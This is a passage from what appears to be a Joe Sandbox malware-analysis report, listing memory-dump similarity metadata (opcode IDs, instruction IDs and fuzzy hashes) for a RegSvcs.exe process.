                                                                                                              • Instruction Fuzzy Hash: F031E536900916AFEB1ADA59CC55E6FBB74FF80710F1142A9E905AB290D730DE04DBE0
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0161895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                              • API String ID: 0-702105204
                                                                                                              • Opcode ID: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                                                                              • Instruction ID: 64b8d1d6ac23d240c278e710413ebece4d8e6be205238496725b71cfed1c5e57
                                                                                                              • Opcode Fuzzy Hash: 8248e92661356623c9f6ab55b7a90bda3e52aac5063590d5937e1a62f61f2c8c
                                                                                                              • Instruction Fuzzy Hash: A901F732610202AFE7346E5D9C94A6A7B6AFFC57A4B0C191CF6421B669CF206881C796
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                                                                              • Instruction ID: f0b8d7cd69eae8425c0673d5410579b29b297d91ca66977e3e5f0fe0d9517c9b
                                                                                                              • Opcode Fuzzy Hash: 39187277d691cd4cb7c4e82ecaffca208e72f57aa55bdbbe96cd81deb39fdddb
                                                                                                              • Instruction Fuzzy Hash: 6942AF316083429BE725CF68CCA0A6BBBE5BFC8700F49492DFA8297350D771D949CB52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                                                                              • Instruction ID: 3c4ada9ff4a4903a70a9db42a631fad0c9de9f18feb378e6ce65a43c8751c857
                                                                                                              • Opcode Fuzzy Hash: 54e7ce91dabbee860db94c371294d9d7fadc5b9b24868337c764f2554439b833
                                                                                                              • Instruction Fuzzy Hash: 48424D75E006299FEB24CF69CC81BADBBF9BF88300F158199E949EB241D7349985CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                                                                              • Instruction ID: 20e116fe8f36b49dba8eb1f8b7fe8b52af07f57fb3636c27c12108de7816792c
                                                                                                              • Opcode Fuzzy Hash: ad3e0d6e0384656a6fb7d03ad1d47bd046be0afc4655712d9e069992395fab8f
                                                                                                              • Instruction Fuzzy Hash: C832DC70A007568FEB25CF69C8547BEBBF2BF84704F24451DE68A9F285DB35A842CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                                                                              • Instruction ID: 8aaef71b6924779f4fd435707c30a502e69509182f759f1cee77b31ee7ade9d1
                                                                                                              • Opcode Fuzzy Hash: 8bf76c7a83cd4ffa5d1892498ab858c1384ebb42b6b530d0b2763a37b5b09089
                                                                                                              • Instruction Fuzzy Hash: B622BE742046618BEB25CFADC894772BBF1AF85300F08855AE9D6CF386D735E452EB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                                                                              • Instruction ID: 9812f7d706734afa15927172a42ec3b68331e03aa980b5826098f6ec9054a998
                                                                                                              • Opcode Fuzzy Hash: 58a8d3c3dae2d1d29ee0db5fac2e361c5d1d8c6c3e5787fc762381899c1cf192
                                                                                                              • Instruction Fuzzy Hash: E1328B75A00605CFDF25CFA8C880AAEBBF2FF88310F144569EA56AB391D734E845CB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction ID: fecccd2611f362c14b9f5defd40a7cc6a8d4797a8fcd2b8817c86ddc77684ad4
                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                              • Instruction Fuzzy Hash: DFF12D71E0021A9FDF25CF99D590AEEBBF5BF48710F048529EA06AF245E774D841CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                                                                              • Instruction ID: 1694610eaa3fcbd57f15b1a710079bf895729335d8a18bc0588f716ca09cc3c3
                                                                                                              • Opcode Fuzzy Hash: 4650ffbf900f7df5d51169bbe5facf3e32b699c93ed5a414a5720c49956fca17
                                                                                                              • Instruction Fuzzy Hash: C6D1F271E00A2A8BDF15CF68CC41AFEB7F9BF88304F188169D955A7241D735E9068F60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                                                                              • Instruction ID: 51a62ff285a59cbe19d572b5a8d7a922ecfaff33d3c8de607962444ddff3cc9d
                                                                                                              • Opcode Fuzzy Hash: 5f8b0b3fb6ccb64d5825ca536856928e66d78dd9117cdc27c12115f223511ff5
                                                                                                              • Instruction Fuzzy Hash: 1FE17F71508342CFCB15CF28C590A6EBBE1FF89314F05896DE9998B351EB31E909CB92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
                                                                                                              • Instruction ID: fb85fe095832ac08a465baebab75495ab4cba96992447acf10f48aea931d0bd8
                                                                                                              • Opcode Fuzzy Hash: af7c353b32be1fb83a68e6dcffe7335eab7dad780219f73022a7c8b3cae739f3
                                                                                                              • Instruction Fuzzy Hash: 83D1C071A006079BDB18EF69C890ABE77F5FF94308F544629E916EF290E734E950CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction ID: fc5bcf14e287fa5c9ccbfcd25cf61fb574695ad021e2e0eb0a9e3d972e0794df
                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                              • Instruction Fuzzy Hash: 2CB19375A00605AFDB25DF99CD40EABBBBEFF84304F18845DAA0297798DB34E905CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction ID: 5988b7d412e276c184cc3f547b391534933f4dfa8d8f6b3985983f7811b8dac2
                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                              • Instruction Fuzzy Hash: 92B1F431610646AFDB25DBA8C850BBFBBF6BF88304F540559E6569F381EB30E941CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
                                                                                                              • Instruction ID: 997466e09dbd316a1c05eedd5188cd5cf72195dbc253d9a33c9960b417c7a065
                                                                                                              • Opcode Fuzzy Hash: 2215dca57fd01bab1afac735b0cdd01bb6c7d366cad7f7676c08d6a35ba24822
                                                                                                              • Instruction Fuzzy Hash: 14C15870108345DFD764CF19C494BAEBBE5BF88304F44492DEA898B291E774E908CF92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
                                                                                                              • Instruction ID: a915ad3a8260706c1ee740c4da14b1311d581c41d5ddd0c5c5cf1c322ede678b
                                                                                                              • Opcode Fuzzy Hash: 0ee7ca8997babccb47d3c08484442bd290823409bcd1edd68b04f5d518271d6f
                                                                                                              • Instruction Fuzzy Hash: 34B15F70A002668BDB64DF68C890BADB7F5BF84704F0485E9D54AAB291EB709D85CB31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7dac22db0b062a2b4005691d6faa12f25b54fbaad718ecf394c8bcdfeff3e0a
                                                                                                              • Instruction ID: 7bb8b61ad608cfa97956a5e6a5e80baf9b33d2f5081a95fc7f4cbee4d3494d1b
                                                                                                              • Opcode Fuzzy Hash: d7dac22db0b062a2b4005691d6faa12f25b54fbaad718ecf394c8bcdfeff3e0a
                                                                                                              • Instruction Fuzzy Hash: DAA12632E00659AFEB21DF98C885BEEBBA4FB01754F08011AEB51AF691D7749D40CBD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
                                                                                                              • Instruction ID: 9eb3b467e5451931326c57747c8a4f6f21680dd06f31a85e91c1bc805d3f0cfd
                                                                                                              • Opcode Fuzzy Hash: 7c861fdefd95251dd21e52ddaf271468501957b57ec4b1a13c45917aeb1bfe42
                                                                                                              • Instruction Fuzzy Hash: 22A1A070B016169BEB35DF6DC990BBEB7A5FF54318F004529EA499B2C2DB34E811CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
                                                                                                              • Instruction ID: a1e26bce7ff292a5555ecd5d4b62d3506767966d02f2a2a93c44558209bc88c2
                                                                                                              • Opcode Fuzzy Hash: 0ebde36031e6193a6600d50071067d2a836674804275a6e2dc10b1c51708af59
                                                                                                              • Instruction Fuzzy Hash: BEA1CB72A10252AFC721DF18CD80B6ABBE9FF88708F45462CE5899B750DB34EC51CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                              • Instruction ID: d1393dac5205affffa2739e033c67a59d6261f60c9d670ce67e6ca45cf2b4e91
                                                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                              • Instruction Fuzzy Hash: 0FB13971E0061ADFDF15CFA9CC90AADBBB9FF98350F148169E914AB354D730A941CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc61b3cf30b873d4f8b2d33d21ba00ac69ff6ebd3e206e41f7c9b1252b912291
                                                                                                              • Instruction ID: 67c053a95efe9f940cbef240a4db82e09531b9c84fe3ce866445e1385becd370
                                                                                                              • Opcode Fuzzy Hash: dc61b3cf30b873d4f8b2d33d21ba00ac69ff6ebd3e206e41f7c9b1252b912291
                                                                                                              • Instruction Fuzzy Hash: 4F91B075E00216AFDB15CFA8DC90BAEBFB5AF48710F194169E610EB355D7B4E9008BA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 18db648eebfe8f20d92b8e8d3e08c7fcfdd8bccaf0b954e6f5acd149506cc6ee
                                                                                                              • Instruction ID: 302bc20eb6c49223ba306611f52dd4a34523d91cc2a2986f3060c1d42b55ee7c
                                                                                                              • Opcode Fuzzy Hash: 18db648eebfe8f20d92b8e8d3e08c7fcfdd8bccaf0b954e6f5acd149506cc6ee
                                                                                                              • Instruction Fuzzy Hash: 13914531A40616CBEB24EB58D841B7DBBE1FF88718F454469EA459F280E734D941CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ffa6eceb965f4adc5d09f9335d5bcc9d89c23a941f0fb8c1996bbda66c574c9
                                                                                                              • Instruction ID: c9001a00a22348dfb1ec850edb1d8d2d847cc11427cc8d01fcc84618d5a140bb
                                                                                                              • Opcode Fuzzy Hash: 2ffa6eceb965f4adc5d09f9335d5bcc9d89c23a941f0fb8c1996bbda66c574c9
                                                                                                              • Instruction Fuzzy Hash: 1E81A3B1E006169FDB28CF69D944ABEBBF9FB58740F04852EE455EB640E334D940CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction ID: b40d23d0d0803aa22e3b53c0ba26bfea274d82b14ec5c39e25c909f1151a8fae
                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                              • Instruction Fuzzy Hash: 80818272A0020A9FDF59DF99C890AAEBBF6BF84310F14866DDD169B345D734E901CB80
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
                                                                                                              • Instruction ID: bd799331de9b62a0bc526b83589ed09ed91e66794dc877677520e231f9199130
                                                                                                              • Opcode Fuzzy Hash: fc481bd4c3ad847ef393f849363d3352260b0c10ddea536a780e48f40d172f6f
                                                                                                              • Instruction Fuzzy Hash: 36816F71900609AFDB25CFA8C881AEEBBFAFF88714F10442DE556AB250D730BC05CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 63f134205dbb597f48477bd9366f9eff3ffeefeaf79a05343d730fc6e2b0c338
                                                                                                              • Instruction ID: 3902a18e55884a585c1f1d776e2c341b2e56e28841043500019419fc54c684de
                                                                                                              • Opcode Fuzzy Hash: 63f134205dbb597f48477bd9366f9eff3ffeefeaf79a05343d730fc6e2b0c338
                                                                                                              • Instruction Fuzzy Hash: AD71AC7590466ADBCB25CF58D8907BEBBB5FF48710F54455EEA42AF390E7309800CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08dcda320c258c20098fcc23aa0d64c7c1a91abeb3dc42c312cfbe2d9b2eec60
                                                                                                              • Instruction ID: 877dd39eb1777ddc002b606f8dcf4715adcaf15e8fe82e7548cd1d5df92a06fe
                                                                                                              • Opcode Fuzzy Hash: 08dcda320c258c20098fcc23aa0d64c7c1a91abeb3dc42c312cfbe2d9b2eec60
                                                                                                              • Instruction Fuzzy Hash: 38719F71900205EFDB20DF99DE42B9EBBF9FF90300F10925AEA11AB359CB318981CB54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6520d66d1e502fb63f1b1331d8625322b8451e24c54e763e5b9376b0e4f75158
                                                                                                              • Instruction ID: 5cf2add3a351b7ef2c9882148657276f5ed72f26978c1f315d62aaf2758a7c97
                                                                                                              • Opcode Fuzzy Hash: 6520d66d1e502fb63f1b1331d8625322b8451e24c54e763e5b9376b0e4f75158
                                                                                                              • Instruction Fuzzy Hash: 0871AC356446429FD312DF2CC481B6EBBE5FF88310F4485AAE8998F352EB34D946CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction ID: 994230561d0bdc61ee508da366580cbf0a2593b2b261258b05267b84ee35dcb9
                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction Fuzzy Hash: E3715F71A0061AEFDB10DFA9C984EDEBBB9FF88704F144569E505EB250DB34EA41CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                                                                              • Instruction ID: 4b17f2815647a83835ae111b0509bfc63029153139f7c36e0ba182a27de0be3e
                                                                                                              • Opcode Fuzzy Hash: 05eb5c077ee49f15f869fb2ac5dd881870f8ac78bf9d0a26c574ef0fc4f14a1c
                                                                                                              • Instruction Fuzzy Hash: 24710432240B12AFE732CF18CC44F5ABBA6FF80714F148518EA968B2A0D770E945CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0e0846f74d36af0fafbb56795e6f571f8565a1c8a62a84e6b72dedf11b35f30
                                                                                                              • Instruction ID: 30008b02db2b1e4c95e6394b5fa9f98df46e3b9f6767d1fa0346f107d6cfab5e
                                                                                                              • Opcode Fuzzy Hash: f0e0846f74d36af0fafbb56795e6f571f8565a1c8a62a84e6b72dedf11b35f30
                                                                                                              • Instruction Fuzzy Hash: D4710971E0020AAFDB16DBA4CC41FEEBBBDFB44354F104169E611BB290E774AA45CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08389916ab772ca90a5c35acf0a8b9232bf9edf705cc026b2eed675bbc9c5c9b
                                                                                                              • Instruction ID: aac0f3dc9dac5138e338570e3940eddead739f233b6b6c9989d18d028f828983
                                                                                                              • Opcode Fuzzy Hash: 08389916ab772ca90a5c35acf0a8b9232bf9edf705cc026b2eed675bbc9c5c9b
                                                                                                              • Instruction Fuzzy Hash: 0951BE72545612BFD722DEA8CC44A9FBBE8EBC4750F014929FA41DB250D770ED0587A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52dce73e07561fa582ee4566d6345b9cdbec0a98fffbfc8a978ceb4821c7f2c5
                                                                                                              • Instruction ID: 41367952c9d285b9ea57a1c49882e84d8330df38facb3cca438e576c257c5ced
                                                                                                              • Opcode Fuzzy Hash: 52dce73e07561fa582ee4566d6345b9cdbec0a98fffbfc8a978ceb4821c7f2c5
                                                                                                              • Instruction Fuzzy Hash: 1C519E70900705AFD721DF9AC880A9BFBFDBF94710F10471EE19657AA2C7B0A545CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                                                                              • Instruction ID: 8489e331530b539fe31faea3f8c7b32cfb97b0121994c35e6853b11f924de3a2
                                                                                                              • Opcode Fuzzy Hash: e9eac073f052f112e2345eef6a231ee3a74ea5e4cba7f59fe675410860ec67c2
                                                                                                              • Instruction Fuzzy Hash: 52518A71640A06EFCB22EFA9CD90E6AB7FAFF54744F40086DE5458B261D730E940CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
